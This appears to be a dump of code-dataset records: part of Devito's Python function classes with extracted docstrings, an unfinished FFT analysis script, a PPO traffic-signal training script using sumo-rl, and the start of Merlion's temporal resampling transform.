shape = list(grid.shape_local)
if save is None:
shape.insert(cls._time_position, time_order + 1)
elif isinstance(save, Buffer):
shape.insert(cls._time_position, save.val)
elif isinstance(save, int):
shape.insert(cls._time_position, save)
else:
raise TypeError("`save` can be None, int or Buffer, not %s" % type(save))
elif dimensions is None:
raise TypeError("`dimensions` required if both `grid` and "
"`shape` are provided")
else:
shape = super(TimeFunction, cls).__shape_setup__(
grid=grid, shape=shape, dimensions=dimensions
)
return tuple(shape)
@cached_property
def _fd_priority(self):
return 2.1 if self.staggered in [NODE, None] else 2.2
@property
def time_order(self):
"""The time order."""
return self._time_order
@property
def forward(self):
"""Symbol for the time-forward state of the TimeFunction."""
i = int(self.time_order / 2) if self.time_order >= 2 else 1
_t = self.dimensions[self._time_position]
return self._subs(_t, _t + i * _t.spacing)
@property
def backward(self):
"""Symbol for the time-backward state of the TimeFunction."""
i = int(self.time_order / 2) if self.time_order >= 2 else 1
_t = self.dimensions[self._time_position]
return self._subs(_t, _t - i * _t.spacing)
@property
def _time_size(self):
return self.shape_allocated[self._time_position]
@property
def time_size(self):
return self._time_size
@property
def _time_buffering(self):
return not is_integer(self.save)
@property
def _time_buffering_default(self):
return self._time_buffering and not isinstance(self.save, Buffer)
def _arg_check(self, args, intervals):
super(TimeFunction, self)._arg_check(args, intervals)
key_time_size = args[self.name].shape[self._time_position]
if self._time_buffering and self._time_size != key_time_size:
raise InvalidArgument("Expected `time_size=%d` for runtime "
"value `%s`, found `%d` instead"
% (self._time_size, self.name, key_time_size))
# Pickling support
_pickle_kwargs = Function._pickle_kwargs + ['time_order', 'save', 'time_dim']
class SubFunction(Function):
"""
A Function bound to a "parent" DiscreteFunction.
A SubFunction hands control of argument binding and halo exchange to its
parent DiscreteFunction.
"""
def __init_finalize__(self, *args, **kwargs):
super(SubFunction, self).__init_finalize__(*args, **kwargs)
self._parent = kwargs['parent']
def __padding_setup__(self, **kwargs):
# SubFunctions aren't expected to be used in time-consuming loops
return tuple((0, 0) for i in range(self.ndim))
def _halo_exchange(self):
return
def _arg_values(self, **kwargs):
if self.name in kwargs:
raise RuntimeError("`%s` is a SubFunction, so it can't be assigned "
"a value dynamically" % self.name)
else:
return self._parent._arg_defaults(alias=self._parent).reduce_all()
@property
def parent(self):
return self._parent
_pickle_kwargs = Function._pickle_kwargs + ['parent']
class TempFunction(DiscreteFunction):
"""
Tensor symbol used to store an intermediate sub-expression extracted from
one or more symbolic equations.
Users should not instantiate this class directly. TempFunctions may be created
by Devito to store intermediate sub-expressions ("temporary values") when the
user supplies the `cire-ftemps` option to an Operator.
Unlike other DiscreteFunction types, TempFunctions do not carry data directly.
However, they can generate Functions to override the TempFunction at Operator
application time (see the Examples section below).
TempFunctions are useful if the user wants to retain control over the allocation
and deletion of temporary storage (by default, instead, Devito uses Arrays, which
are allocated and deallocated upon entering and exiting C-land, respectively).
Examples
--------
The `make` method makes the TempFunction create a new Function. For more info,
refer to TempFunction.make.__doc__.
.. code-block:: python
op = Operator(...)
cfuncs = [i for i in op.input if i.is_TempFunction]
kwargs = {i.name: i.make(grid.shape) for i in cfuncs}
op.apply(..., **kwargs)
"""
is_TempFunction = True
def __init_finalize__(self, *args, **kwargs):
super().__init_finalize__(*args, **kwargs)
self._pointer_dim = kwargs.get('pointer_dim')
@classmethod
def __indices_setup__(cls, **kwargs):
pointer_dim = kwargs.get('pointer_dim')
dimensions = as_tuple(kwargs['dimensions'])
if pointer_dim not in dimensions:
# This is a bit hacky but it does work around duplicate dimensions when
# it gets to pickling
dimensions = as_tuple(pointer_dim) + dimensions
# Sanity check
assert not any(d.is_NonlinearDerived for d in dimensions)
return dimensions, dimensions
def __halo_setup__(self, **kwargs):
pointer_dim = kwargs.get('pointer_dim')
dimensions = as_tuple(kwargs['dimensions'])
halo = as_tuple(kwargs.get('halo'))
if halo is None:
halo = tuple((0, 0) for _ in dimensions)
if pointer_dim is not None and pointer_dim not in dimensions:
halo = ((0, 0),) + as_tuple(halo)
return halo
@property
def data(self):
# Any attempt at allocating data by the user should fail miserably
raise TypeError("TempFunction cannot allocate data")
data_domain = data
data_with_halo = data
data_ro_domain = data
data_ro_with_halo = data
@property
def pointer_dim(self):
return self._pointer_dim
@property
def dim(self):
return self.pointer_dim
@property
def shape(self):
domain = [i.symbolic_size for i in self.dimensions]
return DimensionTuple(*domain, getters=self.dimensions)
@property
def shape_with_halo(self):
domain = self.shape
halo = [sympy.Add(*i, evaluate=False) for i in self._size_halo]
ret = tuple(sum(i) for i in zip(domain, halo))
return DimensionTuple(*ret, getters=self.dimensions)
shape_allocated = DiscreteFunction.symbolic_shape
def make(self, shape=None, initializer=None, allocator=None, **kwargs):
"""
Create a Function which can be used to override this TempFunction
in a call to `op.apply(...)`.
Parameters
----------
shape : tuple of ints, optional
Shape of the domain region in grid points.
initializer : callable or any object exposing the buffer interface, optional
Data initializer. If a callable is provided, data is allocated lazily.
allocator : MemoryAllocator, optional
Controller for memory allocation. To be used, for example, when one wants
to take advantage of the memory hierarchy in a NUMA architecture. Refer to
`default_allocator.__doc__` for more information.
**kwargs
Mapper of Operator overrides. Used to automatically derive the shape
if not explicitly provided.
"""
if shape is None:
if len(kwargs) == 0:
raise ValueError("Either `shape` or `kwargs` (Operator overrides) "
"must be provided.")
shape = []
for n, i in enumerate(self.shape):
v = i.subs(kwargs)
if not v.is_Integer:
raise ValueError("Couldn't resolve `shape[%d]=%s` with the given "
"kwargs (obtained: `%s`)" % (n, i, v))
shape.append(int(v))
shape = tuple(shape)
elif len(shape) != self.ndim:
raise ValueError("`shape` must contain %d integers, not %d"
% (self.ndim, len(shape)))
elif not all(is_integer(i) for i in shape):
raise ValueError("`shape` must contain integers (got `%s`)" % str(shape))
return Function(name=self.name, dtype=self.dtype, dimensions=self.dimensions,
shape=shape, halo=self.halo, initializer=initializer,
allocator=allocator)
def _make_pointer(self, dim):
return TempFunction(name='p%s' % self.name, dtype=self.dtype, pointer_dim=dim,
dimensions=self.dimensions, halo=self.halo)
def _arg_defaults(self, alias=None):
raise RuntimeError("TempFunction does not have default arguments ")
def _arg_values(self, **kwargs):
if self.name in kwargs:
new = kwargs.pop(self.name)
if isinstance(new, DiscreteFunction):
# Set new values and re-derive defaults
return new._arg_defaults().reduce_all()
else:
raise InvalidArgument("Illegal runtime value for `%s`" % self.name)
else:
raise InvalidArgument("TempFunction `%s` lacks override" % self.name)
# Pickling support
_pickle_kwargs = DiscreteFunction._pickle_kwargs + ['dimensions', 'pointer_dim']
class AliasFunction(DiscreteFunction):
"""
Tensor symbol that "aliases" another DiscreteFunction. Aliasing here means that
the AliasFunction logically represents another object. This is most commonly used
when we have a generic routine `foo(af, ...)` that we need to apply to multiple
DiscreteFunctions; here `af` is an AliasFunction, used in the body of `foo`.
Like a TempFunction, an AliasFunction does not carry data.
"""
__indices_setup__ = Function.__indices_setup__
__shape_setup__ = Function.__shape_setup__
@property
def _mem_mapped(self):
return False
@property
def data(self):
# Any attempt at allocating data by the user should fail miserably
raise TypeError("AliasFunction cannot allocate data")
data_domain = data
data_with_halo = data
data_ro_domain = data
data_ro_with_halo = data
|
en
| 0.795372
|
Tensor symbol representing a discrete function in symbolic equations. Unlike an Array, a DiscreteFunction carries data. Notes ----- Users should not instantiate this class directly. Use Function or SparseFunction (or their subclasses) instead. # Required by SymPy, otherwise the presence of __getitem__ will make SymPy # think that a DiscreteFunction is actually iterable, thus breaking many of # its key routines (e.g., solve) The type of the underlying data object. # A `Distributor` to handle domain decomposition (only relevant for MPI) # Staggering metadata # Now that *all* __X_setup__ hooks have been called, we can let the # superclass constructor do its job # There may or may not be a `Grid` attached to the DiscreteFunction # Symbolic (finite difference) coefficients # Data-related properties and data initialization # Initialization postponed until the first access to .data # Allocate memory and initialize it. Note that we do *not* hold # a reference to the user-provided buffer # This is a corner case -- we might get here, for example, when # running with MPI and some processes get 0-size arrays after # domain decomposition. We touch the data anyway to avoid the # case ``self._data is None`` # The only possibility for two DiscreteFunctions to be considered equal # is that they are indeed the same exact object Allocate memory as a Data. # Clear up both SymPy and Devito caches to drop unreachable data # Allocate the actual data object # Initialize data # Perhaps user only wants to initialise the physical domain Setup staggering-related metadata. This method assigns: * 0 to non-staggered dimensions; * 1 to staggered dimensions. # There may or may not be a `Distributor`. In the latter case, the # DiscreteFunction is to be considered "local" to each MPI rank Reference to the data. Unlike :attr:`data` and :attr:`data_with_halo`, this *never* returns a view of the data. This method is for internal use only. The Grid on which the discretization occurred. Form of the coefficients of the function. Shape of the domain region. The domain constitutes the area of the data written to by an Operator. Notes ----- In an MPI context, this is the *local* domain region shape. Shape of the domain region. The domain constitutes the area of the data written to by an Operator. Notes ----- In an MPI context, this is the *local* domain region shape. Alias to ``self.shape``. Shape of the domain+outhalo region. The outhalo is the region surrounding the domain that may be read by an Operator. Notes ----- In an MPI context, this is the *local* with_halo region shape. Further, note that the outhalo of inner ranks is typically empty, while the outhalo of boundary ranks contains a number of elements depending on the rank position in the decomposed grid (corner, side, ...). Shape of the domain+inhalo region. The inhalo region comprises the outhalo as well as any additional "ghost" layers for MPI halo exchanges. Data in the inhalo region are exchanged when running Operators to maintain consistent values as in sequential runs. Notes ----- Typically, this property won't be used in user code, but it may come in handy for testing or debugging Shape of the allocated data. It includes the domain and inhalo regions, as well as any additional padding surrounding the halo. Notes ----- In an MPI context, this is the *local* with_halo region shape. Global shape of the domain region. The domain constitutes the area of the data written to by an Operator. Notes ----- In an MPI context, this is the *global* domain region shape, which is therefore identical on all MPI ranks. The global number of elements this object is expected to store in memory. Note that this would need to be combined with self.dtype to give the actual size in bytes. Number of points in the outer halo region. # Computational domain is not distributed and hence the outhalo # and inhalo correspond A space order of {0} and a halo size of {1} has been set but the current rank ({2}) has a domain size of only {3} The number of elements this object is expected to store in memory. Note that this would need to be combined with self.dtype to give the actual size in bytes. Boolean mask telling which Dimensions support modulo-indexing. Slice-based mask to access the domain region of the allocated data. Slice-based mask to access the domain+inhalo region of the allocated data. Slice-based mask to access the domain+outhalo region of the allocated data. Tuple of Decomposition objects, representing the domain decomposition. None is used as a placeholder for non-decomposed Dimensions. Tuple of Decomposition objects, representing the domain+outhalo decomposition. None is used as a placeholder for non-decomposed Dimensions. The domain data values, as a numpy.ndarray. Elements are stored in row-major format. Notes ----- With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro` instead. Gather distributed `Data` attached to a `Function` onto a single rank. Parameters ---------- rank : int The rank onto which the data will be gathered. step : int or tuple of ints The `slice` step in each dimension. start : int or tuple of ints The `slice` start in each dimension. stop : int or tuple of ints The final point of the `slice` to include. Notes ----- Alias to ``self.data._gather``. Note that gathering data from large simulations onto a single rank may result in memory blow-up and hence should use this method judiciously. The domain data values. Elements are stored in row-major format. Notes ----- Alias to ``self.data``. With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro_domain` instead. The domain+outhalo data values. Elements are stored in row-major format. Notes ----- With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro_with_halo` instead. The domain+inhalo data values. Elements are stored in row-major format. Notes ----- This accessor does *not* support global indexing. With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro_with_inhalo` instead. Typically, this accessor won't be used in user code to set or read data values. Instead, it may come in handy for testing or debugging The allocated data values, that is domain+inhalo+padding. Elements are stored in row-major format. Notes ----- This accessor does *not* support global indexing. With this accessor you are claiming that you will modify the values you get back. If you only need to look at the values, use :meth:`data_ro_allocated` instead. Typically, this accessor won't be used in user code to set or read data values. Instead, it may come in handy for testing or debugging The data values in a given region. Parameters ---------- region : DataRegion The data region of interest (e.g., OWNED, HALO) for which a view is produced. dim : Dimension The dimension of interest. side : DataSide The side of interest (LEFT, RIGHT). Notes ----- This accessor does *not* support global indexing. With this accessor you are claiming that you will modify the values you get back. Typically, this accessor won't be used in user code to set or read data values. Read-only view of the domain data values. Read-only view of the domain+outhalo data values. Read-only view of the domain+inhalo data values. Notes ----- This accessor does *not* support global indexing. Read-only view of the domain+inhalo+padding data values. Notes ----- This accessor does *not* support global indexing. Tuple of slices representing the global indices that logically belong to the calling MPI rank. Notes ----- Given a Function ``f(x, y)`` with shape ``(nx, ny)``, when *not* using MPI this property will return ``(slice(0, nx-1), slice(0, ny-1))``. On the other hand, when MPI is used, the local ranges depend on the domain decomposition, which is carried by ``self.grid``. Tuple of Dimensions defining the physical space. Tuple of MPI-distributed Dimensions. A ctypes object representing the DiscreteFunction that can be passed to an Operator. # MPI-related fields # stash a reference to the array on _obj, so we don't let it get freed # while we hold onto _obj Cast the data carried by a DiscreteFunction dataobj to an ndarray. # Depends on how fields are populated in `_C_make_dataobj` Symbolic representation of a given data region. # Note: identical to region=HALO, side=CENTER # Note: identical to region=OWNED, side=CENTER Perform the halo exchange with the neighboring processes. # Nothing to do # Get involved peers # Gather send data # Setup recv buffer # Communication # Scatter received data Tuple of argument names introduced by this function. A map of default argument values defined by this symbol. Parameters ---------- alias : DiscreteFunction, optional To bind the argument values to different names. # Collect default dimension arguments from all indices A map of argument values after evaluating user input. If no user input is provided, return a default value. Parameters ---------- **kwargs Dictionary of user-provided argument overrides. # Add value override for own data if it is provided, otherwise # use defaults # Set new values and re-derive defaults # We've been provided a pure-data replacement (array) # Add value overrides for all associated dimensions Check that ``args`` contains legal runtime values bound to ``self``. Raises ------ InvalidArgument If, given the runtime values ``args``, an out-of-bounds array access would be performed, or if shape/dtype don't match with self's shape/dtype. # Pickling support Tensor symbol representing a discrete function in symbolic equations. A Function carries multi-dimensional data and provides operations to create finite-differences approximations. A Function encapsulates space-varying data; for data that also varies in time, use TimeFunction instead. Parameters ---------- name : str Name of the symbol. grid : Grid, optional Carries shape, dimensions, and dtype of the Function. When grid is not provided, shape and dimensions must be given. For MPI execution, a Grid is compulsory. space_order : int or 3-tuple of ints, optional Discretisation order for space derivatives. Defaults to 1. ``space_order`` also impacts the number of points available around a generic point of interest. By default, ``space_order`` points are available on both sides of a generic point of interest, including those nearby the grid boundary. Sometimes, fewer points suffice; in other scenarios, more points are necessary. In such cases, instead of an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization order (``o``) as well as the number of points on the left (``lp``) and right (``rp``) sides of a generic point of interest. shape : tuple of ints, optional Shape of the domain region in grid points. Only necessary if ``grid`` isn't given. dimensions : tuple of Dimension, optional Dimensions associated with the object. Only necessary if ``grid`` isn't given. dtype : data-type, optional Any object that can be interpreted as a numpy data type. Defaults to ``np.float32``. staggered : Dimension or tuple of Dimension or Stagger, optional Define how the Function is staggered. initializer : callable or any object exposing the buffer interface, optional Data initializer. If a callable is provided, data is allocated lazily. allocator : MemoryAllocator, optional Controller for memory allocation. To be used, for example, when one wants to take advantage of the memory hierarchy in a NUMA architecture. Refer to `default_allocator.__doc__` for more information. padding : int or tuple of ints, optional .. deprecated:: shouldn't be used; padding is now automatically inserted. Allocate extra grid points to maximize data access alignment. When a tuple of ints, one int per Dimension should be provided. Examples -------- Creation >>> from devito import Grid, Function >>> grid = Grid(shape=(4, 4)) >>> f = Function(name='f', grid=grid) >>> f f(x, y) >>> g = Function(name='g', grid=grid, space_order=2) >>> g g(x, y) First-order derivatives through centered finite-difference approximations >>> f.dx Derivative(f(x, y), x) >>> f.dy Derivative(f(x, y), y) >>> g.dx Derivative(g(x, y), x) >>> (f + g).dx Derivative(f(x, y) + g(x, y), x) First-order derivatives through left/right finite-difference approximations >>> f.dxl Derivative(f(x, y), x) Note that the fact that it's a left-derivative isn't captured in the representation. However, upon derivative expansion, this becomes clear >>> f.dxl.evaluate f(x, y)/h_x - f(x - h_x, y)/h_x >>> f.dxr Derivative(f(x, y), x) Second-order derivative through centered finite-difference approximation >>> g.dx2 Derivative(g(x, y), (x, 2)) Notes ----- The parameters must always be given as keyword arguments, since SymPy uses ``*args`` to (re-)create the dimension arguments of the symbolic object. # Attach additional metadata to self's cache entry # Space order # Flag whether it is a parameter or a variable. # Used at operator evaluation to evaluate the Function at the # variable location (i.e. if the variable is staggered in x the # parameter has to be computed at x + hx/2) Dynamically add derivative short-cuts. # Staggered indices # Got `grid`, `dimensions`, and `shape`. We sanity-check that the # Dimensions in `dimensions` also appearing in `grid` have same size # (given by `shape`) as that provided in `grid` # Auto-padding # 0-padding in all Dimensions except in the Fastest Varying Dimension, # `fvd`, which is the innermost one # Let UB be a function that rounds up a value `x` to the nearest # multiple of the SIMD vector length, `vl` # Given the HALO and DOMAIN sizes, the right-PADDING is such that: # * the `fvd` size is a multiple of `vl` # * it contains *at least* `vl` points # This way: # * all first grid points along the `fvd` will be cache-aligned # * there is enough room to round up the loop trip counts to maximize # the effectiveness SIMD vectorization The space order. Generate a symbolic expression computing the sum of ``p`` points along the spatial dimensions ``dims``. Parameters ---------- p : int, optional The number of summands. Defaults to the halo size. dims : tuple of Dimension, optional The Dimensions along which the sum is computed. Defaults to ``self``'s spatial dimensions. Generate a symbolic expression computing the average of ``p`` points along the spatial dimensions ``dims``. Parameters ---------- p : int, optional The number of summands. Defaults to the halo size. dims : tuple of Dimension, optional The Dimensions along which the average is computed. Defaults to ``self``'s spatial dimensions. # Pickling support Tensor symbol representing a discrete function in symbolic equations. A TimeFunction carries multi-dimensional data and provides operations to create finite-differences approximations, in both space and time. A TimeFunction encapsulates space- and time-varying data. Parameters ---------- name : str Name of the symbol. grid : Grid, optional Carries shape, dimensions, and dtype of the Function. When grid is not provided, shape and dimensions must be given. For MPI execution, a Grid is compulsory. space_order : int or 3-tuple of ints, optional Discretisation order for space derivatives. Defaults to 1. ``space_order`` also impacts the number of points available around a generic point of interest. By default, ``space_order`` points are available on both sides of a generic point of interest, including those nearby the grid boundary. Sometimes, fewer points suffice; in other scenarios, more points are necessary. In such cases, instead of an integer, one can pass a 3-tuple ``(o, lp, rp)`` indicating the discretization order (``o``) as well as the number of points on the left (``lp``) and right (``rp``) sides of a generic point of interest. time_order : int, optional Discretization order for time derivatives. Defaults to 1. shape : tuple of ints, optional Shape of the domain region in grid points. Only necessary if `grid` isn't given. dimensions : tuple of Dimension, optional Dimensions associated with the object. Only necessary if `grid` isn't given. dtype : data-type, optional Any object that can be interpreted as a numpy data type. Defaults to `np.float32`. save : int or Buffer, optional By default, ``save=None``, which indicates the use of alternating buffers. This enables cyclic writes to the TimeFunction. For example, if the TimeFunction ``u(t, x)`` has shape (3, 100), then, in an Operator, ``t`` will assume the values ``1, 2, 0, 1, 2, 0, 1, ...`` (note that the very first value depends on the stencil equation in which ``u`` is written.). The default size of the time buffer when ``save=None`` is ``time_order + 1``. To specify a different size for the time buffer, one should use the syntax ``save=Buffer(mysize)``. Alternatively, if all of the intermediate results are required (or, simply, to avoid using an alternating buffer), an explicit value for ``save`` ( an integer) must be provided. time_dim : Dimension, optional TimeDimension to be used in the TimeFunction. Defaults to ``grid.time_dim``. staggered : Dimension or tuple of Dimension or Stagger, optional Define how the Function is staggered. initializer : callable or any object exposing the buffer interface, optional Data initializer. If a callable is provided, data is allocated lazily. allocator : MemoryAllocator, optional Controller for memory allocation. To be used, for example, when one wants to take advantage of the memory hierarchy in a NUMA architecture. Refer to `default_allocator.__doc__` for more information. padding : int or tuple of ints, optional .. deprecated:: shouldn't be used; padding is now automatically inserted. Allocate extra grid points to maximize data access alignment. When a tuple of ints, one int per Dimension should be provided. Examples -------- Creation >>> from devito import Grid, TimeFunction >>> grid = Grid(shape=(4, 4)) >>> f = TimeFunction(name='f', grid=grid) >>> f f(t, x, y) >>> g = TimeFunction(name='g', grid=grid, time_order=2) >>> g g(t, x, y) First-order derivatives through centered finite-difference approximations >>> f.dx Derivative(f(t, x, y), x) >>> f.dt Derivative(f(t, x, y), t) >>> g.dt Derivative(g(t, x, y), t) When using the alternating buffer protocol, the size of the time dimension is given by ``time_order + 1`` >>> f.shape (2, 4, 4) >>> g.shape (3, 4, 4) One can drop the alternating buffer protocol specifying a value for ``save`` >>> h = TimeFunction(name='h', grid=grid, save=20) >>> h h(time, x, y) >>> h.shape (20, 4, 4) Notes ----- The parameters must always be given as keyword arguments, since SymPy uses ``*args`` to (re-)create the dimension arguments of the symbolic object. If the parameter ``grid`` is provided, the values for ``shape``, ``dimensions`` and ``dtype`` will be derived from it. When present, the parameter ``shape`` should only define the spatial shape of the grid. The temporal dimension will be inserted automatically as the leading dimension. Position of time index among the function indices. # Check we won't allocate too much memory for the system Dynamically add derivative short-cuts. # Force to None if 0/False/None/... The time order. Symbol for the time-forward state of the TimeFunction. Symbol for the time-backward state of the TimeFunction. # Pickling support A Function bound to a "parent" DiscreteFunction. A SubFunction hands control of argument binding and halo exchange to its parent DiscreteFunction. # SubFunctions aren't expected to be used in time-consuming loops Tensor symbol used to store an intermediate sub-expression extracted from one or more symbolic equations. Users should not instantiate this class directly. TempFunctions may be created by Devito to store intermediate sub-expressions ("temporary values") when the user supplies the `cire-ftemps` option to an Operator. Unlike other DiscreteFunction types, TempFunctions do not carry data directly. However, they can generate Functions to override the TempFunction at Operator application time (see the Examples section below). TempFunctions are useful if the user wants to retain control over the allocation and deletion of temporary storage (by default, instead, Devito uses Arrays, which are allocated and deallocated upon entering and exiting C-land, respectively). Examples -------- The `make` method makes the TempFunction create a new Function. For more info, refer to TempFunction.make.__doc__. .. code-block:: python op = Operator(...) cfuncs = [i for i in op.input if i.is_TempFunction] kwargs = {i.name: i.make(grid.shape) for i in cfuncs} op.apply(..., **kwargs) # This is a bit hacky but it does work around duplicate dimensions when # it gets to pickling # Sanity check # Any attempt at allocating data by the user should fail miserably Create a Function which can be used to override this TempFunction in a call to `op.apply(...)`. Parameters ---------- shape : tuple of ints, optional Shape of the domain region in grid points. initializer : callable or any object exposing the buffer interface, optional Data initializer. If a callable is provided, data is allocated lazily. allocator : MemoryAllocator, optional Controller for memory allocation. To be used, for example, when one wants to take advantage of the memory hierarchy in a NUMA architecture. Refer to `default_allocator.__doc__` for more information. **kwargs Mapper of Operator overrides. Used to automatically derive the shape if not explicitly provided. # Set new values and re-derive defaults # Pickling support Tensor symbol that "aliases" another DiscreteFunction. Aliasing here means that the AliasFunction logically represents another object. This is most commonly used when we have a generic routine `foo(af, ...)` that we need to apply to multiple DiscreteFunctions; here `af` is an AliasFunction, used in the body of `foo`. Like a TempFunction, an AliasFunction does not carry data. # Any attempt at allocating data by the user should fail miserably
| 1.879975
| 2
|
TFLCycles/unfinished/fourier.py
|
stanton119/data-analysis
| 0
|
6627584
|
<reponame>stanton119/data-analysis<filename>TFLCycles/unfinished/fourier.py
# %% Time results using fft
import numpy as np
import scipy.fftpack
# Number of samplepoints
N = 600
# sample spacing
T = 1.0 / 800.0
x = np.linspace(0.0, N * T, N)
y = np.sin(50.0 * 2.0 * np.pi * x) + 0.5 * np.sin(80.0 * 2.0 * np.pi * x)
yf = scipy.fftpack.fft(y)
xf = np.linspace(0.0, 1.0 / (2.0 * T), int(N / 2))
plt.plot(x, y, ".")
fig, ax = plt.subplots()
ax.plot(xf, 2.0 / N * np.abs(yf[: N // 2]))
plt.show()
temp.loc[:, ["datetimeint", "count"]]
norm_count = (temp["count"] - temp["count"].mean()).to_numpy()
norm_count.shape
yf = scipy.fftpack.fft(norm_count,)
xf = temp["datetimeint"]
temp["datetimeint"].max() - temp["datetimeint"].min()
# np.linspace(0.0, 1.0/(2.0*T), int(N/2))
fig, ax = plt.subplots()
ax.plot(xf, 2.0 / N * np.abs(yf))
ax.plot(xf, 2.0 / N * np.abs(yf[: N // 2]))
plt.show()
plt.plot(temp["datetimeint"].diff())
temp["datetimeint"].diff()[1]
temp["datetimeint"][:2]
Y = np.fft.fft(norm_count)
freq = np.fft.fftfreq(len(norm_count), temp["datetimeint"].diff()[1])
plt.figure()
plt.plot(freq, np.abs(Y), ".")
plt.figure()
plt.plot(freq, np.angle(Y))
plt.show()
# %% [markdown]
# Convert to jupyter notebook -> Export current (no output)
# # Convert to markdown file
# `jupyter nbconvert data_proc.ipynb --to markdown`
|
# %% Time results using fft
import numpy as np
import scipy.fftpack
# Number of samplepoints
N = 600
# sample spacing
T = 1.0 / 800.0
x = np.linspace(0.0, N * T, N)
y = np.sin(50.0 * 2.0 * np.pi * x) + 0.5 * np.sin(80.0 * 2.0 * np.pi * x)
yf = scipy.fftpack.fft(y)
xf = np.linspace(0.0, 1.0 / (2.0 * T), int(N / 2))
plt.plot(x, y, ".")
fig, ax = plt.subplots()
ax.plot(xf, 2.0 / N * np.abs(yf[: N // 2]))
plt.show()
temp.loc[:, ["datetimeint", "count"]]
norm_count = (temp["count"] - temp["count"].mean()).to_numpy()
norm_count.shape
yf = scipy.fftpack.fft(norm_count,)
xf = temp["datetimeint"]
temp["datetimeint"].max() - temp["datetimeint"].min()
# np.linspace(0.0, 1.0/(2.0*T), int(N/2))
fig, ax = plt.subplots()
ax.plot(xf, 2.0 / N * np.abs(yf))
ax.plot(xf, 2.0 / N * np.abs(yf[: N // 2]))
plt.show()
plt.plot(temp["datetimeint"].diff())
temp["datetimeint"].diff()[1]
temp["datetimeint"][:2]
Y = np.fft.fft(norm_count)
freq = np.fft.fftfreq(len(norm_count), temp["datetimeint"].diff()[1])
plt.figure()
plt.plot(freq, np.abs(Y), ".")
plt.figure()
plt.plot(freq, np.angle(Y))
plt.show()
# %% [markdown]
# Convert to jupyter notebook -> Export current (no output)
# # Convert to markdown file
# `jupyter nbconvert data_proc.ipynb --to markdown`
|
en
| 0.538583
|
# %% Time results using fft # Number of samplepoints # sample spacing # np.linspace(0.0, 1.0/(2.0*T), int(N/2)) # %% [markdown] # Convert to jupyter notebook -> Export current (no output) # # Convert to markdown file # `jupyter nbconvert data_proc.ipynb --to markdown`
| 2.384575
| 2
|
experiments/sb3_grid4x4.py
|
evantancy/sumo-rl
| 0
|
6627585
|
<reponame>evantancy/sumo-rl
from stable_baselines3 import PPO
import sumo_rl
import supersuit as ss
from stable_baselines3.common.vec_env import VecMonitor
from stable_baselines3.common.evaluation import evaluate_policy
from stable_baselines3.common.callbacks import EvalCallback
import numpy as np
if __name__ == "__main__":
env = sumo_rl.grid4x4(use_gui=True, out_csv_name="outputs/grid4x4/ppo_test")
env = ss.pettingzoo_env_to_vec_env_v0(env)
env = ss.concat_vec_envs_v0(env, 2, num_cpus=1, base_class="stable_baselines3")
env = VecMonitor(env)
model = PPO(
"MlpPolicy",
env,
verbose=3,
gamma=0.95,
n_steps=256,
ent_coef=0.0905168,
learning_rate=0.00062211,
vf_coef=0.042202,
max_grad_norm=0.9,
gae_lambda=0.99,
n_epochs=5,
clip_range=0.3,
batch_size=256,
)
model.learn(total_timesteps=100000)
mean_reward, std_reward = evaluate_policy(model, env, n_eval_episodes=10)
print(mean_reward)
print(std_reward)
|
from stable_baselines3 import PPO
import sumo_rl
import supersuit as ss
from stable_baselines3.common.vec_env import VecMonitor
from stable_baselines3.common.evaluation import evaluate_policy
from stable_baselines3.common.callbacks import EvalCallback
import numpy as np
if __name__ == "__main__":
env = sumo_rl.grid4x4(use_gui=True, out_csv_name="outputs/grid4x4/ppo_test")
env = ss.pettingzoo_env_to_vec_env_v0(env)
env = ss.concat_vec_envs_v0(env, 2, num_cpus=1, base_class="stable_baselines3")
env = VecMonitor(env)
model = PPO(
"MlpPolicy",
env,
verbose=3,
gamma=0.95,
n_steps=256,
ent_coef=0.0905168,
learning_rate=0.00062211,
vf_coef=0.042202,
max_grad_norm=0.9,
gae_lambda=0.99,
n_epochs=5,
clip_range=0.3,
batch_size=256,
)
model.learn(total_timesteps=100000)
mean_reward, std_reward = evaluate_policy(model, env, n_eval_episodes=10)
print(mean_reward)
print(std_reward)
|
none
| 1
| 1.79698
| 2
|
|
merlion/transform/resample.py
|
ankitakashyap05/Merlion
| 1
|
6627586
|
<filename>merlion/transform/resample.py
#
# Copyright (c) 2021 salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
"""
Transforms that resample the input in time, or stack adjacent observations
into vectors.
"""
from collections import OrderedDict
import logging
from typing import List, Tuple, Union
import numpy as np
from merlion.transform.base import TransformBase, InvertibleTransformBase
from merlion.utils import UnivariateTimeSeries, TimeSeries
from merlion.utils.resample import (
granularity_str_to_seconds,
get_gcd_timedelta,
reindex_df,
AlignPolicy,
AggregationPolicy,
MissingValuePolicy,
)
logger = logging.getLogger(__name__)
class TemporalResample(TransformBase):
"""
Defines a policy to temporally resample a time series at a specified
granularity. Note that while this transform does support inversion, the
recovered time series may differ from the input due to information loss
when downsampling.
"""
def __init__(
self,
granularity: Union[str, int, float] = None,
origin: int = None,
trainable_granularity: bool = None,
remove_non_overlapping=True,
aggregation_policy: Union[str, AggregationPolicy] = "Mean",
missing_value_policy: Union[str, MissingValuePolicy] = "Interpolate",
):
"""
Defines a policy to temporally resample a time series.
:param granularity: The granularity at which we want to resample.
:param origin: The time stamp defining the offset to start at.
:param trainable_granularity: Whether the granularity is trainable,
i.e. train() will set it to the GCD timedelta of a time series.
If ``None`` (default), it will be trainable only if no granularity is
explicitly given.
:param remove_non_overlapping: If ``True``, we will only keep the portions
of the univariates that overlap with each other. For example, if we
have 3 univariates which span timestamps [0, 3600], [60, 3660], and
[30, 3540], we will only keep timestamps in the range [60, 3540]. If
``False``, we will keep all timestamps produced by the resampling.
:param aggregation_policy: The policy we will use to aggregate multiple
values in a window (downsampling).
:param missing_value_policy: The policy we will use to impute missing
values (upsampling).
"""
super().__init__()
if not isinstance(granularity, (int, float)):
granularity = granularity_str_to_seconds(granularity)
self.granularity = granularity
self.origin = origin
if trainable_granularity is None:
trainable_granularity = granularity is None
self.trainable_granularity = trainable_granularity
self.remove_non_overlapping = remove_non_overlapping
self.aggregation_policy = aggregation_policy
self.missing_value_policy = missing_value_policy
@property
